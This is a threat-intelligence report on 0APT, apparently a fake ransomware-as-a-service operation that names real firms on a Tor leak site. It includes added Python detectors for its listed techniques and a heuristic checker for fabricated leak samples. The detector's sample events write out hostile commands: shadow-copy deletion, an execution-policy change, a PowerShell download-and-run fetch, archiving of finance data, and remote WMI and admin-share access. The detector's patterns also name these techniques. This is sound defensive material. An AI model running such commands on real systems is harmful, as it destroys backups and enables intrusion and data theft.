Full Report
A new threat actor has launched what appears to be a fake ransomware-as-a-service (RaaS) operation called 0APT. Over the last week, 0APT published a data leak site (DLS) with fake companies. However, the actor has caused alarm in the past few days after publishing the names of several real organizations and has reportedly prompted some companies to initiate incident response processes. The threat actor 0APT appeared in January 2026 and within only a few days claimed more than 150 victims via its DLS on a Tor-based domain. However, it quickly became clear that many of the alleged victims could not be verified and appeared to be artificially generated.
Analysis Summary
# Threat Actor: 0APT
## Attribution & Identity
The actor is a **new threat actor** that emerged in **January 2026**. The operation appears to be a **fake Ransomware-as-a-Service (RaaS) operation**. No specific attribution to a nation-state or established cybercrime group is mentioned.
## Activity Summary
0APT launched a supposed RaaS operation and quickly published a Data Leak Site (DLS) on a Tor-based domain, claiming over 150 victims within a few days of appearing (January 2026). Initially, the DLS listed fake companies. More recently, the actor caused alarm by publishing the names of several **real organizations**. Analyst assessment suggests the claims are **doubtful**: alleged victims could not be verified, data samples appeared fabricated (e.g., containing repeating null bytes and suspiciously large metadata files), and the alleged malware sample was described as a "work in progress." The activity is assessed as potentially designed to cause panic or as a test of infrastructure.
## Tactics, Techniques & Procedures
The identified potential TTPs stem from linked threat hunt packages associated with their activity, suggesting potential post-exploitation behaviors:
- WinRAR Archive Creation
- Remote WMI Command Attempt
- Network SMB Profiling (Potential Nonstandard SMB Communication Behavior)
- Remote Services (SMB Share mounts/admin shares/scanning)
- Shadow Copies Deletion Using Operating Systems Utilities
- Attempt To Set Default PowerShell Execution Policy To Unrestricted
- Methods for Downloading Files with PowerShell
- Excessive Windows Discovery CommandLine Arguments (Potential Malware Installation)
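The threat-hunt package names above map to process-creation telemetry that most EDR or Sysmon deployments already collect. The following is an added example (not code from the report or from any threat-hunt vendor) of a minimal rule set for those behaviors run over constructed Windows process-creation events; the regexes, the discovery-burst threshold and the sample events are this example's own assumptions, and hostnames, users and the URL are placeholders.

```python
"""Minimal detection rules for the 0APT-linked TTPs listed in the report,
run over constructed Windows process-creation events. Rule names mirror the
threat-hunt package names on the page; the patterns are assumptions."""
import re
from collections import Counter

# Each rule: (name, regex applied to "<image> <cmdline>").
RULES = [
    ("Shadow Copies Deletion Using Operating Systems Utilities",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|"
                r"wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    ("Attempt To Set Default PowerShell Execution Policy To Unrestricted",
     re.compile(r"set-executionpolicy\s+(-\w+\s+)*unrestricted|-ExecutionPolicy\s+Unrestricted", re.I)),
    ("Methods for Downloading Files with PowerShell",
     # curl/wget are PowerShell aliases for Invoke-WebRequest on Windows
     re.compile(r"invoke-webrequest|\biwr\s|\bcurl\s|\bwget\s|downloadstring|downloadfile|"
                r"start-bitstransfer|net\.webclient", re.I)),
    ("WinRAR Archive Creation",
     re.compile(r"\b(rar|winrar)(\.exe)?\s+a\b", re.I)),
    ("Remote WMI Command Attempt",
     re.compile(r"wmic(\.exe)?\s+/node:|invoke-wmimethod.*-computername|invoke-cimmethod.*-computername", re.I)),
    ("Remote Services (admin share access)",
     re.compile(r"net(\.exe)?\s+use\s+\\\\[^\s]+\\(admin|c|ipc)\$", re.I)),
]

# Commands whose bursty use on one host suggests automated discovery.
DISCOVERY = re.compile(r"\b(whoami|systeminfo|net\s+(view|group|user|localgroup)|nltest|"
                       r"ipconfig|tasklist|quser|netstat)\b", re.I)
DISCOVERY_THRESHOLD = 5  # assumption: >= 5 discovery commands per host in the batch


def match_rules(event):
    """Return the names of all rules that fire on a single event."""
    text = f"{event['image']} {event['cmdline']}"
    return [name for name, rx in RULES if rx.search(text)]


def excessive_discovery(events, threshold=DISCOVERY_THRESHOLD):
    """Hosts whose discovery-command count meets the threshold."""
    counts = Counter(e["host"] for e in events if DISCOVERY.search(e["cmdline"]))
    return {host: n for host, n in counts.items() if n >= threshold}


def triage(events):
    """Map each fired rule to the sorted list of hosts it fired on."""
    hits = {}
    for e in events:
        for name in match_rules(e):
            hits.setdefault(name, []).append(e["host"])
    hits = {k: sorted(set(v)) for k, v in hits.items()}
    burst = excessive_discovery(events)
    if burst:
        hits["Excessive Windows Discovery CommandLine Arguments"] = sorted(burst)
    return hits


# Constructed sample telemetry, not real events.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "alice", "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "WS01", "user": "alice", "image": "powershell.exe",
     "cmdline": "powershell.exe -c Set-ExecutionPolicy Unrestricted -Scope LocalMachine"},
    {"host": "WS02", "user": "bob", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\""},
    {"host": "WS02", "user": "bob", "image": "C:\\Program Files\\WinRAR\\Rar.exe",
     "cmdline": "Rar.exe a -r -hp C:\\Users\\Public\\out.rar C:\\Finance\\"},
    {"host": "WS03", "user": "svc", "image": "wmic.exe",
     "cmdline": "wmic.exe /node:FS01 process call create cmd.exe"},
    {"host": "WS03", "user": "svc", "image": "net.exe",
     "cmdline": "net.exe use \\\\FS01\\ADMIN$ /user:corp\\svc"},
    # benign event: no rule should fire
    {"host": "WS04", "user": "carol", "image": "notepad.exe", "cmdline": "notepad.exe report.txt"},
] + [{"host": "WS03", "user": "svc", "image": "cmd.exe", "cmdline": c} for c in (
    "whoami /all", "systeminfo", "net view /domain",
    "net group \"domain admins\" /domain", "nltest /dclist:corp", "ipconfig /all")]

if __name__ == "__main__":
    for rule, hosts in triage(SAMPLE_EVENTS).items():
        print(f"{rule}: {', '.join(hosts)}")
```

Running the block on the constructed batch attributes shadow-copy deletion and the execution-policy change to WS01, the download and archiving to WS02, and remote WMI, admin-share access and a discovery burst to WS03, while the benign editor launch fires nothing. In production these patterns belong in the SIEM or EDR query language rather than Python, but the rule-per-TTP structure and the per-host aggregation for discovery bursts carry over directly.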
## Targeting
- **Sectors:** Not explicitly detailed, but the initial publication of real organization names caused some companies to initiate incident response.
- **Geography:** Global coverage implied ("more than 150 companies worldwide").
- **Victims:** Numerous alleged victims (150+), though most appear artificially generated. A few **real organizations** were named more recently, prompting incident response.
## Tools & Infrastructure
- **Malware Families Used:** An alleged associated malware sample was analyzed and found to be a "work in progress," not fully operational ransomware.
- **Infrastructure (C2, domains, IPs):** Operated a **DLS on a Tor-based domain**.
## Implications
0APT represents a threat focused on **extortion and reputational damage** through the *creation of panic* via fake breach claims. While the operation appears largely fraudulent at this stage, the tactic of naming real companies shifts the risk from background noise to something that requires immediate validation, potentially leading to unnecessary escalation of incident response procedures and resource drain (alert fatigue). There remains a small possibility that this activity serves as reconnaissance or platform testing for future genuine operations.
## Mitigations
- **Validate Breach Claims:** Do not immediately assume legitimacy; carefully review evidence for credible proof of data exfiltration (unique samples, internal documents). Treat claims skeptically if data appears generic, corrupted, or artificially generated.
- **Monitor Associated TTPs:** Remain vigilant for suspicious PowerShell activity, WinRAR creation, WMI execution, nonstandard SMB communication, shadow copy deletion, and PowerShell policy changes.
- **Tune SOC Processes:** Implement efficient triage and validation processes to filter out unsubstantiated claims and reduce alert fatigue.
- **Communicate Carefully:** If named on a leak site without proof of compromise, communicate clearly that validation is underway to prevent internal/external panic.
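The fabrication indicators named in the activity summary (repeating null bytes, suspiciously large metadata files) and the validation step in the first mitigation can be turned into a repeatable first-pass check before an incident is declared. The following is an added example (not code from the report) that scores a purported leak-site sample on null-byte ratio, byte entropy and the share of unique 512-byte blocks, and compares a manifest's size against the payload it claims to describe. The thresholds and the constructed sample files are this example's own assumptions; a "likely fabricated" verdict is a reason to deprioritize, and anything else still needs an analyst to look for unique internal documents.

```python
"""First-pass triage of a purported leak sample. Heuristics and thresholds
are assumptions for this example, tuned to the fabrication patterns the
report describes (null padding, repeated content, oversized metadata)."""
import hashlib
import math
from collections import Counter

BLOCK = 512
NULL_RATIO_MAX = 0.5      # assumption: more than half null bytes is padding
UNIQUE_BLOCK_MIN = 0.2    # assumption: fewer than 1 in 5 distinct blocks is filler
ENTROPY_MIN = 1.0         # assumption: below 1 bit/byte carries no real content


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; ~0 for padding, ~4-5 for text, ~8 for compressed/encrypted."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def null_ratio(data: bytes) -> float:
    return data.count(0) / len(data) if data else 0.0


def unique_block_ratio(data: bytes, block: int = BLOCK) -> float:
    blocks = [data[i:i + block] for i in range(0, len(data), block)]
    return len(set(blocks)) / len(blocks) if blocks else 0.0


def assess_sample(data: bytes) -> dict:
    """Return metrics, the fabrication flags that fired, and a verdict."""
    m = {
        "size": len(data),
        "null_ratio": round(null_ratio(data), 3),
        "entropy": round(shannon_entropy(data), 2),
        "unique_block_ratio": round(unique_block_ratio(data), 3),
    }
    flags = []
    if m["null_ratio"] > NULL_RATIO_MAX:
        flags.append("mostly null bytes")
    if m["size"] >= 4 * BLOCK and m["unique_block_ratio"] < UNIQUE_BLOCK_MIN:
        flags.append("repeating blocks")
    if m["entropy"] < ENTROPY_MIN:
        flags.append("near-zero information content")
    m["flags"] = flags
    m["verdict"] = "likely fabricated" if flags else "needs analyst review"
    return m


def manifest_oversized(manifest: bytes, described_total_bytes: int) -> bool:
    """Assumption: a file listing should be far smaller than the data it
    describes. A manifest at least as large as its payload matches the
    'suspiciously large metadata file' pattern noted in the report."""
    return len(manifest) >= described_total_bytes


# Constructed samples, not data from any leak site.
# 1. A zip header followed by 64 KiB of null padding.
FAKE_NULL = b"PK\x03\x04" + b"\x00" * 65536
# 2. High-entropy content that is one 512-byte block repeated 64 times.
FAKE_REPEAT = (hashlib.sha256(b"x").digest() * 16) * 64
# 3. Deterministic pseudo-random bytes standing in for a real compressed file.
PLAUSIBLE = b"".join(hashlib.sha256(b"seed" + i.to_bytes(4, "big")).digest()
                     for i in range(256))
# 4. Plain-text records standing in for a real internal document.
INVOICE_TEXT = b"\n".join(f"Invoice {i:04d}: amount {i * 37 % 1000}.00 EUR".encode()
                          for i in range(200))

if __name__ == "__main__":
    for name, blob in [("null-padded", FAKE_NULL), ("repeated-block", FAKE_REPEAT),
                       ("pseudo-random", PLAUSIBLE), ("invoice text", INVOICE_TEXT)]:
        print(name, assess_sample(blob))
    print("manifest oversized:", manifest_oversized(b"x" * 4096, described_total_bytes=1024))
```

The repeated-block sample is the instructive case: its entropy is a healthy 5 bits per byte, so an entropy check alone would pass it, and only the block-diversity check exposes that the file is one chunk copied many times. The pseudo-random and text samples pass every heuristic, which is exactly why the verdict for them is "needs analyst review" rather than "genuine": these checks only rule out obvious fakes.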